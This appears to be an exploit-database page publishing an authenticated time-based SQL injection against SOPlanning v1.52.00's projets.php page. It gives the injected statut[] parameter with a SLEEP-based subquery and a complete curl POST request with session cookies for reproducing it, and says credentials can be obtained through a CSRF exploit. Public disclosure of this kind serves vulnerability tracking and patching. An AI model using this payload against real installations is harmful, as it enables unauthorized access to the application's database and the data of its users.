Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]
Change Mirror[11] Download[12]
Exploit Title: SOPlanning v1.52.00 'projets.php' SQLi
Application: SOPlanning
Version: 1.52.00
Date: 4/22/24
Exploit Author: Joseph McPeters (Liquidsky)
Vendor Homepage: https://www.soplanning.org/en/
Software Link: https://sourceforge.net/projects/soplanning/
Tested on: Linux
CVE: Not yet assigned
Description: SOPlanning v1.52.00 is vulnerable to Authenticated SQL Injection via the 'projects.php' page.
Instructions: Authenticate to the host, the credentials can be obtained using a CSRF exploit (more info included). Once valid credentials are obtained use either a GET/POST request to send the valid parameters that equal to valid SQLi.
Vulnerable request parameters for request to "/www/projets.php":
filtreGroupeProjet=1&statut[]=todo'+AND+(SELECT+8073+FROM+(SELECT(SLEEP(10)))PuxA)+AND+'Liquidsky'='Liquidsky&rechercheProjet=test
The above parameters can be sent as either a valid GET/POST request to trigger the SQLi.
Example Curl Request To Re-Test SQLi:
curl -i -s -k -X $'POST' \
-H $'Host: 127.0.0.1' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 130' -H $'Origin: http://127.0.0.1<http://127.0.0.1/>' -H $'Connection: close' -H $'Referer: http://127.0.0.1/soplanning/www/projets.php' -H $'Upgrade-Insecure-Requests: 1' -H $'Sec-Fetch-Dest: document' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-User: ?1' \
-b $'dateDebut=23/04/2024; dateFin=23/06/2024; xposMoisWin=0; xposJoursWin=0; yposMoisWin=0; yposJoursWin=0; yposProjets=33; PHPSESSID=ovpbclvbc87uh7anfbq2luf9bi; soplanningplanning_=hhrtf0rgs562vm8rhn5i641481; baseLigne=users; baseColonne=jours; afficherTableauRecap=1; masquerLigneVide=0; statut_projet=%5B%22abort%22%2C%22archive%22%2C%22done%22%2C%22progress%22%2C%22todo%22%5D' \
--data-binary $'filtreGroupeProjet=1&statut[]=todo\'+AND+(SELECT+8073+FROM+(SELECT(SLEEP(10)))PuxA)+AND+\'Liquidsky\'=\'Liquidsky&rechercheProjet=test' \
$'http://127.0.0.1/soplanning/www/projets.php'
Note: Cookies need to be authenticated and request needs to be valid for valid SQLi. This curl request can be used with a proxy to reconstruct a valid request.
File Tags
- ActiveX[18] (933)
- Advisory[19] (85,085)
- Arbitrary[20] (16,682)
- BBS[21] (2,859)
- Bypass[22] (1,834)
- CGI[23] (1,032)
- Code Execution[24] (7,643)
- Conference[25] (689)
- Cracker[26] (844)
- CSRF[27] (3,374)
- DoS[28] (24,648)
- Encryption[29] (2,383)
- Exploit[30] (52,862)
- File Inclusion[31] (4,253)
- File Upload[32] (987)
- Firewall[33] (822)
- Info Disclosure[34] (2,855)
- Intrusion Detection[35] (907)
- Java[36] (3,128)
- JavaScript[37] (890)
- Kernel[38] (7,041)
- Local[39] (14,718)
- Magazine[40] (586)
- Overflow[41] (13,082)
- Perl[42] (1,431)
- PHP[43] (5,205)
- Proof of Concept[44] (2,371)
- Protocol[45] (3,703)
- Python[46] (1,604)
- Remote[47] (31,449)
- Root[48] (3,618)
- Rootkit[49] (523)
- Ruby[50] (619)
- Scanner[51] (1,650)
- Security Tool[52] (7,983)
- Shell[53] (3,258)
- Shellcode[54] (1,217)
- Sniffer[55] (900)
- Spoof[56] (2,261)
- SQL Injection[57] (16,542)
- TCP[58] (2,425)
- Trojan[59] (689)
- UDP[60] (899)
- Virus[61] (669)
- Vulnerability[62] (32,652)
- Web[63] (9,885)
- Whitepaper[64] (3,775)
- x86[65] (967)
- XSS[66] (18,184)
- Other[67]
File Archives
- May 2024[68]
- April 2024[69]
- March 2024[70]
- February 2024[71]
- January 2024[72]
- December 2023[73]
- November 2023[74]
- October 2023[75]
- September 2023[76]
- August 2023[77]
- July 2023[78]
- June 2023[79]
- Older[80]
Systems
- AIX[81] (429)
- Apple[82] (2,078)
- BSD[83] (376)
- CentOS[84] (58)
- Cisco[85] (1,927)
- Debian[86] (7,025)
- Fedora[87] (1,693)
- FreeBSD[88] (1,246)
- Gentoo[89] (4,467)
- HPUX[90] (880)
- iOS[91] (373)
- iPhone[92] (108)
- IRIX[93] (220)
- Juniper[94] (69)
- Linux[95] (49,485)
- Mac OS X[96] (691)
- Mandriva[97] (3,105)
- NetBSD[98] (256)
- OpenBSD[99] (488)
- RedHat[100] (15,706)
- Slackware[101] (941)
- Solaris[102] (1,611)
- SUSE[103] (1,444)
- Ubuntu[104] (9,480)
- UNIX[105] (9,394)
- UnixWare[106] (187)
- Windows[107] (6,653)
- Other[108]
- Services
- Security Services[119]
- Hosting By
- Rokasec[120]